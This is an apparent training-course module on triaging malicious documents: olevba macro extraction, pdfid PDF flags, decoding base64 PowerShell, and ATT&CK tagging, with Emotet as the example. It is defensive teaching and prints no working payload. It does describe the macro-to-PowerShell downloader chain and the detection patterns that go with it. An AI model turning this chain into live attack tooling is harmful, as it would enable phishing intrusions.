Module 11 — Document & Script Malware¶

Type 6 · Reconstruct — extract embedded macros from a .doc with olevba, flag suspicious objects in a PDF with pdfid, and decode a base64 PowerShell payload, deliverable an IOC summary with ATT&CK tagging (T1566.001, T1059.001) for each artifact. (Secondary: Misconception Reveal — an olevba score is triage priority, not a verdict.) Go to the hands-on lab →

Last reviewed: 2026-06

Malware Analysis — analyse the attack surface that reaches every inbox: weaponised Office files, PDFs, and obfuscated scripts.

Difficulty: Intermediate · Estimated time: ~3.5–5.5 hrs (study + lab) · Prerequisites: Foundations

In 60 seconds

Weaponised documents are a top initial-access vector not because the technique is clever but because the delivery is legitimate — Outlook opens the .docx, Adobe opens the PDF, PowerShell runs the script, and the malicious logic rides inside a trusted container. olevba, pdfid, and oletools make triage tractable in minutes — but an olevba score is triage priority, not a verdict. The whole maldoc chain (macro → Shell → base64 PowerShell) decodes without ever executing the file, because base64 is encoding, not encryption.

Why this matters¶

Phishing with weaponised documents remains one of the top initial-access vectors year after year. The reason is not that the technique is sophisticated — it is that the delivery is legitimate. Outlook opens .docx files; Adobe opens PDFs; PowerShell runs scripts. The malicious logic rides inside a trusted container. An analyst who cannot triage a suspicious document is blocked at the most common entry point for enterprise intrusions. Tools like olevba, pdfid, and oletools make this triage tractable in minutes. Emotet is the textbook maldoc chain: it spread for years through phishing emails carrying a Word document with a malicious VBA macro (T1566.001) that, on open, launched an obfuscated PowerShell downloader (T1059.001) to pull the payload — the precise macro → Shell/CreateObject → base64-PowerShell sequence this module triages. (Emotet — MITRE ATT&CK S0367 documents the spearphishing-attachment delivery and the PowerShell stage.)

Objective¶

Extract and analyse the embedded macros from a synthetic .doc file using olevba, identify suspicious objects in a synthetic PDF using pdfid, and decode a base64-obfuscated PowerShell script — producing an IOC summary and ATT&CK tagging for each.

The core idea¶

The mental model

The malicious logic rides inside a trusted container, so triage is about finding the attack surface inside it. Office files are compound formats (OLE2 for .doc/.xls; Open XML zip archives for .docx/.xlsx) and macros live in the OLE stream as VBA p-code and source. olevba extracts and decompresses the source and scores the high-risk bits — auto-execute handlers (AutoOpen, Document_Open), shell invocations (Shell, CreateObject("WScript.Shell")), string obfuscation, network access.

flowchart LR
    D["phishing .doc"] --> A["VBA macro<br/>AutoOpen / Document_Open"]
    A --> SH["Shell / CreateObject<br/>(WScript.Shell)"]
    SH --> PS["base64 PowerShell<br/>downloader"]
    PS --> PL["fetch + run payload"]

The gotcha

The olevba score is a triage priority, not a verdict. A score above the warning threshold means "look more carefully," not "this is malicious" — benign documents with legitimate macros score too, and treating the number as a label produces both false alarms and false clears. The verdict comes from reading what the macro actually does, not from the heuristic total.

PDFs are more structurally permissive. The format supports JavaScript, embedded files (including executable PE binaries), and URI launch actions — all within the PDF specification. pdfid counts the occurrences of high-risk PDF object types: /JS and /JavaScript flag embedded JavaScript; /OpenAction and /AA flag automatic execution triggers; /EmbeddedFile flags an embedded object. The presence of /JS + /OpenAction together is the most reliable signal of a malicious PDF — benign PDFs rarely need both. pdfid alone does not extract or execute the JavaScript; for that, you would use pdf-parser or peepdf.

Go deeper: PowerShell obfuscation and the triage workflow

Most phishing chains end in a PowerShell stage — Emotet's macro spawned an obfuscated command that rebuilt its download URLs at runtime. The canonical idiom: a base64 blob, then [System.Convert]::FromBase64String() + [System.Text.Encoding]::Unicode.GetString(). This is encoding, not encryption — no key, so decoding is always possible once you find the blob. FromBase64String is your entry point; the decoded string is your next IOC. Full workflow: hash → olevba/pdfid to find the surface → extract the script → decode strings → identify the payload URL/filename. None of it requires executing the document.

Learn (~2.5 hrs)¶

oletools and Office macro analysis - decalage2/oletools — olevba documentation — the canonical reference; read the "Indicators" and "Output format" sections (~25 min). - SANS ISC — "Maldoc Analysis with olevba" (diary) — a real-world walkthrough on a phishing document; shows the full triage flow (~20 min).

PDF analysis - pdfid documentation (Didier Stevens) — explains the keyword counts and what each flag means; read "pdfid" and the "Usage" section (~20 min). - MITRE ATT&CK T1566.001 — Phishing: Spearphishing Attachment — covers maldocs as an initial-access technique with real procedure examples (~15 min).

PowerShell obfuscation - MITRE ATT&CK T1059.001 — Command and Scripting Interpreter: PowerShell — includes obfuscation sub-techniques and detection opportunities (~15 min). - Emotet — MITRE ATT&CK S0367 — the canonical maldoc family: spearphishing attachment (T1566.001) → VBA macro → obfuscated PowerShell downloader (T1059.001). Read its delivery techniques to anchor the triage chain in this module on a real campaign (~15 min).

Key concepts¶

olevba extracts VBA source and applies heuristic scoring — score is triage priority, not verdict.
Auto-execute handlers (AutoOpen, Document_Open) plus Shell/CreateObject is the highest-risk pattern.
/JS + /OpenAction together in a PDF is the primary maldoc signal; pdfid counts both.
PowerShell base64 payloads always use FromBase64String as the decode call — that string is your pivot.
Full document-malware triage never requires executing the document.
ATT&CK: T1566.001 (phishing delivery), T1059.001 (PowerShell execution), T1027.010 (obfuscated macros).
Real worked family: Emotet (maldoc downloader) — phishing Word doc → VBA macro → obfuscated base64 PowerShell downloader is the exact chain this module triages, attributed to a real high-volume campaign

AI acceleration¶

Paste extracted VBA or decoded PowerShell into a model and prompt: "Analyse this script. List any IOCs (URLs, IPs, file paths), identify the likely payload delivery mechanism, and map the behaviour to ATT&CK technique IDs." Effective for rapid triage of long macro scripts. Verify any extracted URL by checking it against VirusTotal before using it in reporting — do not browse to it.

AI caveat

A model triages long macro/PowerShell scripts fast and pulls IOCs well, but the extracted URL is a lead, not a confirmed indicator — verify it via VirusTotal, and never browse to it from your analysis host.

Check yourself

Why is a weaponised document such a durable initial-access vector despite being unsophisticated?
An olevba score is high. What does that license you to conclude, and what does it not?
Why can a base64 PowerShell payload always be decoded statically, while a true encrypted blob cannot?

Comments

Sign in with GitHub to comment. Choose the type: Feedback (errors or suggestions on this page) · Hints (help for fellow learners — no spoilers) · General (anything else).